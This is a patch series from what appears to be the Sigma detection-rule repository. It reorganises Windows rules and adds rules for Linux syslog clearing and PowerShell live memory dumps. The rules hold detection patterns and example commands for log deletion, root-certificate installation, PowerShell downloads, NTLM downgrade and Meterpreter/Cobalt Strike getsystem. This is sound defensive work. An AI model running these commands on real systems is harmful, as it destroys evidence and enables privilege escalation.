https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 author: Florian Roth date: 2017/01/10 -modified: 2021/07/09 +modified: 2021/09/21 tags: - attack.defense_evasion - attack.t1070 # an old one - attack.t1070.001 - car.2016-04-002 -falsepositives: - - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) - - System provisioning (system reset before the golden image creation) -level: high ---- -id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982 logsource: product: windows service: security @@ -30,14 +24,7 @@ detection: - 517 - 1102 condition: selection ---- -id: a62b37e0-45d3-48d9-a517-90c1a1b0186b -logsource: - product: windows - service: system -detection: - selection: - EventID: 104 - Source: Microsoft-Windows-Eventlog - condition: selection - +falsepositives: + - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) + - System provisioning (system reset before the golden image creation) +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_system_susp_eventlog_cleared.yml b/rules/windows/builtin/win_system_susp_eventlog_cleared.yml new file mode 100644 index 00000000..c267a4a6 --- /dev/null +++ b/rules/windows/builtin/win_system_susp_eventlog_cleared.yml @@ -0,0 +1,32 @@ +title: Eventlog Cleared +id: a62b37e0-45d3-48d9-a517-90c1a1b0186b +related: + - id: f2f01843-e7b8-4f95-a35a-d23584476423 + type: obsoletes + - id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982 + type: derived +description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution +references: + - https://twitter.com/deviouspolack/status/832535435960209408 + - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 +author: Florian Roth +date: 2017/01/10 +modified: 2021/09/21 +tags: + - attack.defense_evasion + - attack.t1070 # an old one + - attack.t1070.001 + - car.2016-04-002 +logsource: + product: windows + service: system +detection: + selection: + EventID: 104 + Source: Microsoft-Windows-Eventlog + condition: selection +falsepositives: + - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) + - System provisioning (system reset before the golden image creation) +level: high + From 6368a88ad39b4f9bd893a8dad707818c28db8350 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 13:28:47 +0200 Subject: [PATCH 1014/1367] split global win_software_discovery.yml --- .../builtin/win_software_discovery.yml | 27 ++++------------ .../process_creation_software_discovery.yml | 31 +++++++++++++++++++ 2 files changed, 37 insertions(+), 21 deletions(-) create mode 100755 rules/windows/process_creation/process_creation_software_discovery.yml diff --git a/rules/windows/builtin/win_software_discovery.yml b/rules/windows/builtin/win_software_discovery.yml index 39148779..9a275488 100644 --- a/rules/windows/builtin/win_software_discovery.yml +++ b/rules/windows/builtin/win_software_discovery.yml @@ -1,22 +1,16 @@ -action: global title: Detected Windows Software Discovery +id: 2650dd1a-eb2a-412d-ac36-83f06c4f2282 description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/16 +modified: 2021/09/21 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md - https://github.com/harleyQu1nn/AggressorScripts #AVQuery.cna tags: - attack.discovery - attack.t1518 -level: medium -falsepositives: - - Legitimate administration activities -detection: - condition: 1 of them ---- -id: 2650dd1a-eb2a-412d-ac36-83f06c4f2282 logsource: product: windows service: powershell @@ -29,16 +23,7 @@ detection: - '\software\' - 'select-object' - 'format-table' ---- -id: e13f668e-7f95-443d-98d2-1816a7648a7b -logsource: - category: process_creation - product: windows -detection: - selection: - Image|endswith: '\reg.exe' # Example: reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion - CommandLine|contains|all: - - 'query' - - '\software\' - - '/v' - - 'svcversion' + condition: selection +level: medium +falsepositives: + - Legitimate administration activities \ No newline at end of file diff --git a/rules/windows/process_creation/process_creation_software_discovery.yml b/rules/windows/process_creation/process_creation_software_discovery.yml new file mode 100755 index 00000000..7e296e62 --- /dev/null +++ b/rules/windows/process_creation/process_creation_software_discovery.yml @@ -0,0 +1,31 @@ +title: Detected Windows Software Discovery +id: e13f668e-7f95-443d-98d2-1816a7648a7b +related: + - id: 2650dd1a-eb2a-412d-ac36-83f06c4f2282 + type: derived +description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. +status: experimental +author: Nikita Nazarov, oscd.community +date: 2020/10/16 +modified: 2021/09/21 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md + - https://github.com/harleyQu1nn/AggressorScripts #AVQuery.cna +tags: + - attack.discovery + - attack.t1518 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: '\reg.exe' # Example: reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion + CommandLine|contains|all: + - 'query' + - '\software\' + - '/v' + - 'svcversion' + condition: selection +level: medium +falsepositives: + - Legitimate administration activities \ No newline at end of file From ba3c7a020ad327e90fed108c6d46843232d93ab4 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 13:34:32 +0200 Subject: [PATCH 1015/1367] split global win_root_certificate_installed.yml --- .../win_root_certificate_installed.yml | 30 ++++------------- ...ss_creation_root_certificate_installed.yml | 33 +++++++++++++++++++ 2 files changed, 39 insertions(+), 24 deletions(-) create mode 100644 rules/windows/process_creation/process_creation_root_certificate_installed.yml diff --git a/rules/windows/builtin/win_root_certificate_installed.yml b/rules/windows/builtin/win_root_certificate_installed.yml index f670b8f4..5c2557e0 100644 --- a/rules/windows/builtin/win_root_certificate_installed.yml +++ b/rules/windows/builtin/win_root_certificate_installed.yml @@ -1,21 +1,15 @@ -action: global title: Root Certificate Installed +id: 42821614-9264-4761-acfc-5772c3286f76 status: experimental description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md author: 'oscd.community, @redcanary, Zach Stanford @svch0st' date: 2020/10/10 +modified: 2021/09/21 tags: - attack.defense_evasion - attack.t1553.004 -level: medium -falsepositives: - - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP -detection: - condition: 1 of them ---- -id: 42821614-9264-4761-acfc-5772c3286f76 logsource: product: windows service: powershell @@ -30,19 +24,7 @@ detection: ScriptBlockText|contains|all: - 'Import-Certificate' - 'Cert:\LocalMachine\Root' ---- -id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc -logsource: - category: process_creation - product: windows -detection: - selection1: - Image|endswith: '\certutil.exe' # Example: certutil -addstore -f -user ROOT CertificateFileName.der - CommandLine|contains|all: - - '-addstore' - - 'root' - selection2: - Image|endswith: '\CertMgr.exe' # Example: CertMgr.exe /add CertificateFileName.cer /s /r localMachine root /all - CommandLine|contains|all: - - '/add' - - 'root' + condition: selection1 or selection2 +level: medium +falsepositives: + - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP \ No newline at end of file diff --git a/rules/windows/process_creation/process_creation_root_certificate_installed.yml b/rules/windows/process_creation/process_creation_root_certificate_installed.yml new file mode 100644 index 00000000..8cfbde40 --- /dev/null +++ b/rules/windows/process_creation/process_creation_root_certificate_installed.yml @@ -0,0 +1,33 @@ +title: Root Certificate Installed +id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc +related: + - id: 42821614-9264-4761-acfc-5772c3286f76 + type: derived +status: experimental +description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md +author: 'oscd.community, @redcanary, Zach Stanford @svch0st' +date: 2020/10/10 +modified: 2021/09/21 +tags: + - attack.defense_evasion + - attack.t1553.004 +logsource: + category: process_creation + product: windows +detection: + selection1: + Image|endswith: '\certutil.exe' # Example: certutil -addstore -f -user ROOT CertificateFileName.der + CommandLine|contains|all: + - '-addstore' + - 'root' + selection2: + Image|endswith: '\CertMgr.exe' # Example: CertMgr.exe /add CertificateFileName.cer /s /r localMachine root /all + CommandLine|contains|all: + - '/add' + - 'root' + condition: selection1 or selection2 +level: medium +falsepositives: + - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP \ No newline at end of file From 8c13bd23b936af8bdd3da1901eb2bd09fb14c5e1 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 13:44:19 +0200 Subject: [PATCH 1016/1367] split global win_powershell_web_request --- .../powershell_web_request.yml} | 32 ++++++------------- ...rocess_creation_powershell_web_request.yml | 30 +++++++++++++++++ 2 files changed, 39 insertions(+), 23 deletions(-) rename rules/windows/{builtin/win_powershell_web_request.yml => powershell/powershell_web_request.yml} (73%) create mode 100644 rules/windows/process_creation/process_creation_powershell_web_request.yml diff --git a/rules/windows/builtin/win_powershell_web_request.yml b/rules/windows/powershell/powershell_web_request.yml similarity index 73% rename from rules/windows/builtin/win_powershell_web_request.yml rename to rules/windows/powershell/powershell_web_request.yml index 427d7ea9..fb66db23 100644 --- a/rules/windows/builtin/win_powershell_web_request.yml +++ b/rules/windows/powershell/powershell_web_request.yml @@ -1,5 +1,8 @@ -action: global title: Windows PowerShell Web Request +id: 1139d2e2-84b1-4226-b445-354492eba8ba +related: + - id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d + type: derived status: experimental description: Detects the use of various web request methods (including aliases) via Windows PowerShell command references: @@ -7,32 +10,11 @@ references: - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell author: James Pemberton / @4A616D6573 date: 2019/10/24 -modified: 2020/08/24 +modified: 2021/09/21 tags: - attack.execution - attack.t1059.001 - attack.t1086 #an old one -detection: - condition: selection -falsepositives: - - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer. -level: medium ---- -id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d -logsource: - category: process_creation - product: windows -detection: - selection: - CommandLine|contains: - - 'Invoke-WebRequest' - - 'iwr ' - - 'wget ' - - 'curl ' - - 'Net.WebClient' - - 'Start-BitsTransfer' ---- -id: 1139d2e2-84b1-4226-b445-354492eba8ba logsource: product: windows service: powershell @@ -47,3 +29,7 @@ detection: - 'curl ' - 'Net.WebClient' - 'Start-BitsTransfer' + condition: selection +falsepositives: + - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer. +level: medium diff --git a/rules/windows/process_creation/process_creation_powershell_web_request.yml b/rules/windows/process_creation/process_creation_powershell_web_request.yml new file mode 100644 index 00000000..8e5dc23e --- /dev/null +++ b/rules/windows/process_creation/process_creation_powershell_web_request.yml @@ -0,0 +1,30 @@ +title: Windows PowerShell Web Request +id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d +status: experimental +description: Detects the use of various web request methods (including aliases) via Windows PowerShell command +references: + - https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/ + - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell +author: James Pemberton / @4A616D6573 +date: 2019/10/24 +modified: 2021/09/21 +tags: + - attack.execution + - attack.t1059.001 + - attack.t1086 #an old one +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains: + - 'Invoke-WebRequest' + - 'iwr ' + - 'wget ' + - 'curl ' + - 'Net.WebClient' + - 'Start-BitsTransfer' + condition: selection +falsepositives: + - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer. +level: medium \ No newline at end of file From 20a785bad36c7f616afe308e0de0534625b14167 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 13:55:04 +0200 Subject: [PATCH 1017/1367] split global win_powershell_script_installed_as_service.yml --- ...powershell_script_installed_as_service.yml | 38 +++++-------------- ...powershell_script_installed_as_service.yml | 29 ++++++++++++++ ...powershell_script_installed_as_service.yml | 27 +++++++++++++ 3 files changed, 66 insertions(+), 28 deletions(-) create mode 100644 rules/windows/builtin/win_security_powershell_script_installed_as_service.yml create mode 100644 rules/windows/driver_load/driver_load_powershell_script_installed_as_service.yml diff --git a/rules/windows/builtin/win_powershell_script_installed_as_service.yml b/rules/windows/builtin/win_powershell_script_installed_as_service.yml index 6ebf00e9..ba5aef7e 100644 --- a/rules/windows/builtin/win_powershell_script_installed_as_service.yml +++ b/rules/windows/builtin/win_powershell_script_installed_as_service.yml @@ -1,25 +1,15 @@ -action: global title: PowerShell Scripts Installed as Services +id: a2e5019d-a658-4c6a-92bf-7197b54e2cae description: Detects powershell script installed as a Service status: experimental author: oscd.community, Natalia Shornikova date: 2020/10/06 -modified: 2021/05/21 +modified: 2021/09/21 references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse tags: - attack.execution - attack.t1569.002 -detection: - powershell_as_service: - ServiceFileName|contains: - - 'powershell' - - 'pwsh' - condition: service_creation and powershell_as_service -falsepositives: - - Unknown -level: high ---- id: a2e5019d-a658-4c6a-92bf-7197b54e2cae logsource: product: windows @@ -27,19 +17,11 @@ logsource: detection: service_creation: EventID: 7045 ---- -id: 46deb5e1-28c9-4905-b2df-51cdcc9e6073 -logsource: - product: windows - service: sysmon -detection: - service_creation: - EventID: 6 ---- -id: 2a926e6a-4b81-4011-8a96-e36cc8c04302 -logsource: - product: windows - service: security -detection: - service_creation: - EventID: 4697 + powershell_as_service: + ImagePath|contains: + - 'powershell' + - 'pwsh' + condition: service_creation and powershell_as_service +falsepositives: + - Unknown +level: high diff --git a/rules/windows/builtin/win_security_powershell_script_installed_as_service.yml b/rules/windows/builtin/win_security_powershell_script_installed_as_service.yml new file mode 100644 index 00000000..8da937ee --- /dev/null +++ b/rules/windows/builtin/win_security_powershell_script_installed_as_service.yml @@ -0,0 +1,29 @@ +title: PowerShell Scripts Installed as Services +id: 2a926e6a-4b81-4011-8a96-e36cc8c04302 +related: + - id: a2e5019d-a658-4c6a-92bf-7197b54e2cae + type: derived +description: Detects powershell script installed as a Service +status: experimental +author: oscd.community, Natalia Shornikova +date: 2020/10/06 +modified: 2021/09/21 +references: + - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse +tags: + - attack.execution + - attack.t1569.002 +logsource: + product: windows + service: security +detection: + service_creation: + EventID: 4697 + powershell_as_service: + ServiceFileName|contains: + - 'powershell' + - 'pwsh' + condition: service_creation and powershell_as_service +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/driver_load/driver_load_powershell_script_installed_as_service.yml b/rules/windows/driver_load/driver_load_powershell_script_installed_as_service.yml new file mode 100644 index 00000000..468a4f5f --- /dev/null +++ b/rules/windows/driver_load/driver_load_powershell_script_installed_as_service.yml @@ -0,0 +1,27 @@ +title: PowerShell Scripts Run by a Services +id: 46deb5e1-28c9-4905-b2df-51cdcc9e6073 +related: + - id: a2e5019d-a658-4c6a-92bf-7197b54e2cae + type: derived +description: Detects powershell script installed as a Service +status: experimental +author: oscd.community, Natalia Shornikova +date: 2020/10/06 +modified: 2021/09/21 +references: + - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse +tags: + - attack.execution + - attack.t1569.002 +logsource: + product: windows + category: driver_load +detection: + powershell_as_service: + ImageLoaded|contains: + - 'powershell' + - 'pwsh' + condition: powershell_as_service +falsepositives: + - Unknown +level: high \ No newline at end of file From 346ff26809121faa445c102a5b4ffd58eae76bee Mon Sep 17 00:00:00 2001 From: Max Altgelt Date: Tue, 21 Sep 2021 14:22:17 +0200 Subject: [PATCH 1018/1367] feat: Add rule for syslog removal --- rules/linux/lnx_clear_syslog.yml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/linux/lnx_clear_syslog.yml diff --git a/rules/linux/lnx_clear_syslog.yml b/rules/linux/lnx_clear_syslog.yml new file mode 100644 index 00000000..4ca3a5a2 --- /dev/null +++ b/rules/linux/lnx_clear_syslog.yml @@ -0,0 +1,27 @@ +title: Clearing syslog +id: e09eb557-96d2-4de9-ba2d-30f712a5afd3 +status: experimental +description: Detects removal of the syslog +author: Max Altgelt +date: 2021/09/10 +references: + - https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474 +logsource: + product: linux +detection: + selection: + - 'rm /var/log/syslog' + - 'rm -r /var/log/syslog' + - 'rm -f /var/log/syslog' + - 'rm -rf /var/log/syslog' + - 'mv /var/log/syslog' + - ' >/var/log/syslog' + - ' > /var/log/syslog' + falsepositives: + - '/syslog.' + condition: selection and not falsepositives +falsepositives: + - Log rotation +level: high +tags: + - attack.persistence From a5c8fba7a5c07271092e0f760b923e8f6d40aa3a Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 15:01:51 +0200 Subject: [PATCH 1019/1367] fix error --- .../builtin/win_powershell_script_installed_as_service.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/windows/builtin/win_powershell_script_installed_as_service.yml b/rules/windows/builtin/win_powershell_script_installed_as_service.yml index ba5aef7e..30fa2700 100644 --- a/rules/windows/builtin/win_powershell_script_installed_as_service.yml +++ b/rules/windows/builtin/win_powershell_script_installed_as_service.yml @@ -10,7 +10,6 @@ references: tags: - attack.execution - attack.t1569.002 -id: a2e5019d-a658-4c6a-92bf-7197b54e2cae logsource: product: windows service: system From 8c3faa390c8b20a6ad66579a18894db86a3764f2 Mon Sep 17 00:00:00 2001 From: Max Altgelt Date: Tue, 21 Sep 2021 14:55:50 +0200 Subject: [PATCH 1020/1367] feat: Add rule for live memory dumping --- ...ll_memorydump_getstoragediagnosticinfo.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml diff --git a/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml b/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml new file mode 100644 index 00000000..a4b975e4 --- /dev/null +++ b/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml @@ -0,0 +1,23 @@ +title: Live Memory Dump using Get-StorageDiagnosticInfo +id: cd185561-4760-45d6-a63e-a51325112cae +status: experimental +description: Detects a Command used to dump the live memory of a Windows machine +date: 2021/09/21 +references: + - https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo +tags: + - attack.t1003 +author: Max Altgelt +logsource: + product: windows + service: powershell +detection: + dump: + EventID: 4104 + ScriptBlockText|contains|all: + - Get-StorageDiagnosticInfo + - -IncludeLiveDump + condition: dump +falsepositives: + - Diagnostics +level: high From a4ad7e53581cffb5f955601d8f70e323f16b0b59 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 15:10:08 +0200 Subject: [PATCH 1021/1367] split global win_net_ntlm_downgrade.yml --- .../builtin/win_net_ntlm_downgrade.yml | 28 +++-------------- .../registry_event_net_ntlm_downgrade.yml | 30 +++++++++++++++++++ 2 files changed, 34 insertions(+), 24 deletions(-) create mode 100644 rules/windows/registry_event/registry_event_net_ntlm_downgrade.yml diff --git a/rules/windows/builtin/win_net_ntlm_downgrade.yml b/rules/windows/builtin/win_net_ntlm_downgrade.yml index 062e6aa5..e0d1ad8d 100644 --- a/rules/windows/builtin/win_net_ntlm_downgrade.yml +++ b/rules/windows/builtin/win_net_ntlm_downgrade.yml @@ -1,5 +1,8 @@ -action: global title: NetNTLM Downgrade Attack +id: d3abac66-f11c-4ed0-8acb-50cc29c97eed +related: + - id: d67572a0-e2ec-45d6-b8db-c100d14b8ef2 + type: derived description: Detects NetNTLM downgrade attack references: - https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks @@ -11,30 +14,7 @@ tags: - attack.t1089 # an old one - attack.t1562.001 - attack.t1112 -detection: - condition: 1 of them -falsepositives: - - Unknown -level: critical ---- -id: d67572a0-e2ec-45d6-b8db-c100d14b8ef2 -logsource: - product: windows - category: registry_event -detection: - selection1: - TargetObject|contains|all: - - 'SYSTEM\' - - 'ControlSet' - - '\Control\Lsa' - TargetObject|endswith: - - '\lmcompatibilitylevel' - - '\NtlmMinClientSec' - - '\RestrictSendingNTLMTraffic' - ---- # Windows Security Eventlog: Process Creation with Full Command Line -id: d3abac66-f11c-4ed0-8acb-50cc29c97eed logsource: product: windows service: security diff --git a/rules/windows/registry_event/registry_event_net_ntlm_downgrade.yml b/rules/windows/registry_event/registry_event_net_ntlm_downgrade.yml new file mode 100644 index 00000000..b8689348 --- /dev/null +++ b/rules/windows/registry_event/registry_event_net_ntlm_downgrade.yml @@ -0,0 +1,30 @@ +title: NetNTLM Downgrade Attack +id: d67572a0-e2ec-45d6-b8db-c100d14b8ef2 +description: Detects NetNTLM downgrade attack +references: + - https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks +author: Florian Roth, wagga +date: 2018/03/20 +modified: 2021/09/21 +tags: + - attack.defense_evasion + - attack.t1089 # an old one + - attack.t1562.001 + - attack.t1112 +logsource: + product: windows + category: registry_event +detection: + selection1: + TargetObject|contains|all: + - 'SYSTEM\' + - 'ControlSet' + - '\Control\Lsa' + TargetObject|endswith: + - '\lmcompatibilitylevel' + - '\NtlmMinClientSec' + - '\RestrictSendingNTLMTraffic' + condition: selection +falsepositives: + - Unknown +level: critical \ No newline at end of file From 7c8d1ab0375ebd92b6b53836044a62373e733aab Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 15:18:25 +0200 Subject: [PATCH 1022/1367] split global win_moriya_rootkit.yml --- rules/windows/builtin/win_moriya_rootkit.yml | 21 ++++----------- .../file_event/file_event_moriya_rootkit.yml | 26 +++++++++++++++++++ 2 files changed, 31 insertions(+), 16 deletions(-) create mode 100644 rules/windows/file_event/file_event_moriya_rootkit.yml diff --git a/rules/windows/builtin/win_moriya_rootkit.yml b/rules/windows/builtin/win_moriya_rootkit.yml index 276d88f6..7f638760 100644 --- a/rules/windows/builtin/win_moriya_rootkit.yml +++ b/rules/windows/builtin/win_moriya_rootkit.yml @@ -1,21 +1,16 @@ -action: global title: Moriya Rootkit +id: 25b9c01c-350d-4b95-bed1-836d04a4f324 description: Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report status: experimental author: Bhabesh Raj date: 2021/05/06 -modified: 2021/05/12 -level: critical -falsepositives: - - None +modified: 2021/09/21 references: - https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831 tags: - attack.persistence - attack.privilege_escalation - attack.t1543.003 ---- -id: 25b9c01c-350d-4b95-bed1-836d04a4f324 logsource: product: windows service: system @@ -24,12 +19,6 @@ detection: EventID: 7045 ServiceName: ZzNetSvc condition: selection ---- -id: a1507d71-0b60-44f6-b17c-bf53220fdd88 -logsource: - product: windows - category: file_event -detection: - selection: - TargetFilename: 'C:\Windows\System32\drivers\MoriyaStreamWatchmen.sys' - condition: selection +level: critical +falsepositives: + - None \ No newline at end of file diff --git a/rules/windows/file_event/file_event_moriya_rootkit.yml b/rules/windows/file_event/file_event_moriya_rootkit.yml new file mode 100644 index 00000000..2383f3a8 --- /dev/null +++ b/rules/windows/file_event/file_event_moriya_rootkit.yml @@ -0,0 +1,26 @@ +title: Moriya Rootkit +id: a1507d71-0b60-44f6-b17c-bf53220fdd88 +related: + - id: 25b9c01c-350d-4b95-bed1-836d04a4f324 + type: derived +description: Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report +status: experimental +author: Bhabesh Raj +date: 2021/05/06 +modified: 2021/09/21 +references: + - https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831 +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1543.003 +logsource: + product: windows + category: file_event +detection: + selection: + TargetFilename: 'C:\Windows\System32\drivers\MoriyaStreamWatchmen.sys' + condition: selection +level: critical +falsepositives: + - None \ No newline at end of file From 0dd549ba67b3ae27c378337f32139bbccb7f01c6 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 15:25:03 +0200 Subject: [PATCH 1023/1367] fix selection name --- .../registry_event/registry_event_net_ntlm_downgrade.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/registry_event/registry_event_net_ntlm_downgrade.yml b/rules/windows/registry_event/registry_event_net_ntlm_downgrade.yml index b8689348..ab26594b 100644 --- a/rules/windows/registry_event/registry_event_net_ntlm_downgrade.yml +++ b/rules/windows/registry_event/registry_event_net_ntlm_downgrade.yml @@ -15,7 +15,7 @@ logsource: product: windows category: registry_event detection: - selection1: + selection: TargetObject|contains|all: - 'SYSTEM\' - 'ControlSet' From 9dbc71ca2ff8e6947d24c97048f77c77ac29274e Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 15:50:06 +0200 Subject: [PATCH 1024/1367] split global win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml --- ...tstrike_getsystem_service_installation.yml | 44 +++++---------- ...tstrike_getsystem_service_installation.yml | 56 +++++++++++++++++++ ...tstrike_getsystem_service_installation.yml | 55 ++++++++++++++++++ 3 files changed, 125 insertions(+), 30 deletions(-) create mode 100644 rules/windows/builtin/win_security_meterpreter_or_cobaltstrike_getsystem_service_installation.yml create mode 100644 rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml diff --git a/rules/windows/builtin/win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml b/rules/windows/builtin/win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml index 0bd04b69..3ce6bc05 100644 --- a/rules/windows/builtin/win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml +++ b/rules/windows/builtin/win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml @@ -1,9 +1,9 @@ -action: global title: Meterpreter or Cobalt Strike Getsystem Service Installation +id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6 description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation author: Teymur Kheirkhabarov, Ecco, Florian Roth date: 2019/10/26 -modified: 2021/05/20 +modified: 2021/09/21 references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ @@ -12,58 +12,42 @@ tags: - attack.t1134 # an old one - attack.t1134.001 - attack.t1134.002 +logsource: + product: windows + service: system detection: + selection_id: + EventID: 7045 selection: # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a - - ServiceFileName|contains|all: + - ImagePath|contains|all: - 'cmd' - '/c' - 'echo' - '\pipe\' # cobaltstrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a - - ServiceFileName|contains|all: + - ImagePath|contains|all: - '%COMSPEC%' - '/c' - 'echo' - '\pipe\' # cobaltstrike getsystem technique 1b (expanded %COMSPEC%): %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a - - ServiceFileName|contains|all: + - ImagePath|contains|all: - 'cmd.exe' - '/c' - 'echo' - '\pipe\' # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn - - ServiceFileName|contains|all: + - ImagePath|contains|all: - 'rundll32' - '.dll,a' - '/p:' - condition: selection + condition: selection_id and selection fields: - ComputerName - SubjectDomainName - SubjectUserName - - ServiceFileName + - ImagePath falsepositives: - Highly unlikely -level: critical ---- -id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6 -logsource: - product: windows - service: system -detection: - selection: - EventID: 7045 ---- -id: d585ab5a-6a69-49a8-96e8-4a726a54de46 -logsource: - product: windows - category: driver_load ---- -id: ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34 -logsource: - product: windows - service: security -detection: - selection: - EventID: 4697 +level: critical \ No newline at end of file diff --git a/rules/windows/builtin/win_security_meterpreter_or_cobaltstrike_getsystem_service_installation.yml b/rules/windows/builtin/win_security_meterpreter_or_cobaltstrike_getsystem_service_installation.yml new file mode 100644 index 00000000..6fd722d3 --- /dev/null +++ b/rules/windows/builtin/win_security_meterpreter_or_cobaltstrike_getsystem_service_installation.yml @@ -0,0 +1,56 @@ +title: Meterpreter or Cobalt Strike Getsystem Service Installation +id: ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34 +related: + - id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6 + type: derived +description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation +author: Teymur Kheirkhabarov, Ecco, Florian Roth +date: 2019/10/26 +modified: 2021/09/21 +references: + - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment + - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ +tags: + - attack.privilege_escalation + - attack.t1134 # an old one + - attack.t1134.001 + - attack.t1134.002 +logsource: + product: windows + service: security +detection: + selection_id: + EventID: 4697 + selection: + # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a + - ServiceFileName|contains|all: + - 'cmd' + - '/c' + - 'echo' + - '\pipe\' + # cobaltstrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a + - ServiceFileName|contains|all: + - '%COMSPEC%' + - '/c' + - 'echo' + - '\pipe\' + # cobaltstrike getsystem technique 1b (expanded %COMSPEC%): %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a + - ServiceFileName|contains|all: + - 'cmd.exe' + - '/c' + - 'echo' + - '\pipe\' + # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn + - ServiceFileName|contains|all: + - 